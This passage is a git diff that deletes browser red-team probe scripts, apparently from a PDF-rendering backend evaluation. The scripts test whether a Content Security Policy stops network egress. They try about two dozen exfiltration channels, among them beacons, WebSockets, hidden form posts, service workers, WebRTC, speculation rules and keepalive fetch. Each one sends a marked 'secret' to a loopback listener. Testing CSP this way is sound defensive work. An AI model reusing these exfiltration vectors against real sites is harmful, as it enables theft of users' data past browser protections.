XMLHttpRequest(); - x.open("GET", U("xhr")); - x.send(); - }); - await t("beacon", () => { - navigator.sendBeacon(U("beacon"), "data"); - }); - await t("img", () => { - const i = new Image(); - i.src = U("img"); - document.body.appendChild(i); - }); - // CodeQL js/functionality-from-untrusted-source (alert #6): intentional. Exercises - // CSP `script-src` against the loopback listener; see the header note. - await t("script", () => { - const s = document.createElement("script"); - s.src = U("script"); - document.body.appendChild(s); - }); - await t("css", () => { - const l = document.createElement("link"); - l.rel = "stylesheet"; - l.href = U("css"); - document.head.appendChild(l); - }); - await t("cssimport", () => { - const s = document.createElement("style"); - s.textContent = `@import url("${U("cssimport")}");`; - document.head.appendChild(s); - }); - await t("webfont", () => { - const s = document.createElement("style"); - s.textContent = `@font-face{font-family:XEg;src:url("${U("webfont")}")} .fx{font-family:XEg}`; - document.head.appendChild(s); - const d = document.createElement("div"); - d.className = "fx"; - d.textContent = "force the font to load"; - document.body.appendChild(d); - }); - await t("websocket", () => { - new WebSocket("ws://127.0.0.1:8973/" + tag + "-ws"); - }); - await t("eventsrc", () => { - new EventSource(U("eventsource")); - }); - // CodeQL js/functionality-from-untrusted-source (alert #7): intentional. Exercises - // CSP `frame-src` against the loopback listener; see the header note. - await t("iframe", () => { - const f = document.createElement("iframe"); - f.src = U("iframe"); - document.body.appendChild(f); - }); - await t("dynimport", () => import(U("dynimport"))); - - // FORM SUBMISSION -- actually submitted, into a hidden iframe so `form-action` is - // exercised without navigating this page away. - await t("formsubmit", () => { - const sink = document.createElement("iframe"); - sink.name = tag + "-formsink"; - sink.style.display = "none"; - document.body.appendChild(sink); - const f = document.createElement("form"); - f.method = "POST"; - f.action = U("form"); - f.target = sink.name; - const inp = document.createElement("input"); - inp.name = "secret"; - inp.value = "BILLTEXT"; - f.appendChild(inp); - document.body.appendChild(f); - f.submit(); - }); - - // SERVICE WORKER -- registration is itself a network fetch of the script. - await t("serviceworker", () => { - if (!navigator.serviceWorker) throw new DOMException("unsupported", "NotSupportedError"); - return navigator.serviceWorker.register(U("sw")); - }); - - // WORKER-ORIGINATED FETCH -- a separate context from the document. - await t("workerfetch", () => { - const src = `fetch("${U("workerfetch")}",{mode:"no-cors"}).catch(function(){});`; - const blob = new Blob([src], { type: "text/javascript" }); - const w = new Worker(URL.createObjectURL(blob)); - setTimeout(() => w.terminate(), 1500); - }); - - // WEBRTC -- a STUN binding request is UDP; see serve.py's UDP listener. - await t("webrtc", () => { - const p = new RTCPeerConnection({ iceServers: [{ urls: "stun:127.0.0.1:8973" }] }); - p.createDataChannel("x"); - return p.createOffer().then((o) => p.setLocalDescription(o)); - }); - - await new Promise((r) => setTimeout(r, 2500)); - return out.join("\n"); -}; diff --git a/docs/research/pdf-backend-bakeoff/probes/vectors2.js b/docs/research/pdf-backend-bakeoff/probes/vectors2.js deleted file mode 100644 index 99e93a26..00000000 --- a/docs/research/pdf-backend-bakeoff/probes/vectors2.js +++ /dev/null @@ -1,150 +0,0 @@ -// Red-team round 2: exfiltration mechanisms the first harness never attempted. -// -// The published claim is "no subresource or background network egress ... across every -// mechanism CSP governs". That claim is only as good as the vector list, and the first -// list was 16 mechanisms chosen by the same person who wrote the policy. These are the -// ones that list missed, several of which are governed by directives the proposed policy -// does not set at all. -// -// Every vector carries the marker BILLTEXT so the receiving server can attribute it. -window.__tryAll2 = async function (tag) { - const U = (v) => `http://127.0.0.1:8973/${tag}-${v}?secret=BILLTEXT`; - const out = []; - const t = async (name, fn) => { - try { - await fn(); - out.push(name + ":attempted"); - } catch (e) { - out.push(name + ":threw(" + e.name + ")"); - } - }; - - // -- governed by connect-src, but frequently forgotten. - await t("anchorping", () => { - const a = document.createElement("a"); - a.href = "#"; - a.ping = U("ping"); - document.body.appendChild(a); - a.click(); - }); - - // Speculation Rules -- prefetch/prerender a cross-origin URL. Governed by - // `script-src` for the rule block itself, and by default-src/prefetch-src for the - // fetch. A policy written before this API existed will not mention it. - await t("speculationrules", () => { - const s = document.createElement("script"); - s.type = "speculationrules"; - s.textContent = JSON.stringify({ prefetch: [{ source: "list", urls: [U("speculation")] }] }); - document.head.appendChild(s); - }); - - // Resource hints. `prefetch-src` was removed from CSP; these fall back to default-src - // in some engines and to nothing in others. - for (const rel of ["prefetch", "preload", "dns-prefetch", "preconnect"]) { - await t("link-" + rel, () => { - const l = document.createElement("link"); - l.rel = rel; - l.href = U("link-" + rel); - if (rel === "preload") l.as = "fetch"; - document.head.appendChild(l); - }); - } - - // / -- object-src. - await t("object", () => { - const o = document.createElement("object"); - o.data = U("object"); - document.body.appendChild(o); - }); - await t("embed", () => { - const e = document.createElement("embed"); - e.src = U("embed"); - document.body.appendChild(e); - }); - - // Media -- media-src, which the proposed policy does not set (default-src covers it, - // but only if default-src is actually 'none'). - await t("video", () => { - const v = document.createElement("video"); - v.src = U("video"); - v.autoplay = true; - document.body.appendChild(v); - v.load(); - }); - await t("track", () => { - const v = document.createElement("video"); - const tr = document.createElement("track"); - tr.src = U("track"); - tr.kind = "subtitles"; - tr.default = true; - v.appendChild(tr); - document.body.appendChild(v); - }); - - // SVG external references. - await t("svgimage", () => { - document.body.insertAdjacentHTML( - "beforeend", - ``, - ); - }); - await t("svguse", () => { - document.body.insertAdjacentHTML( - "beforeend", - ``, - ); - }); - - // CSS background-image -- img-src. - await t("cssbg", () => { - const s = document.createElement("style"); - s.textContent = `.bgx{background-image:url("${U("cssbg")}")}`; - document.head.appendChild(s); - const d = document.createElement("div"); - d.className = "bgx"; - d.textContent = "."; - document.body.appendChild(d); - }); - - // fetch with keepalive -- survives page teardown, the classic exfil-on-unload trick. - await t("keepalive", () => fetch(U("keepalive"), { mode: "no-cors", keepalive: true })); - - // WebTransport -- HTTP/3; governed by connect-src. - await t("webtransport", () => { - if (typeof WebTransport === "undefined") throw new DOMException("n/a", "NotSupportedError"); - new WebTransport("https://127.0.0.1:8973/" + tag + "-webtransport"); - }); - - // importScripts from inside a worker (distinct from the worker's own fetch). - await t("importscripts", () => { - const src = `try{importScripts("${U("importscripts")}")}catch(e){}`; - const w = new Worker(URL.createObjectURL(new Blob([src], { type: "text/javascript" }))); - setTimeout(() => w.terminate(), 1200); - }); - - //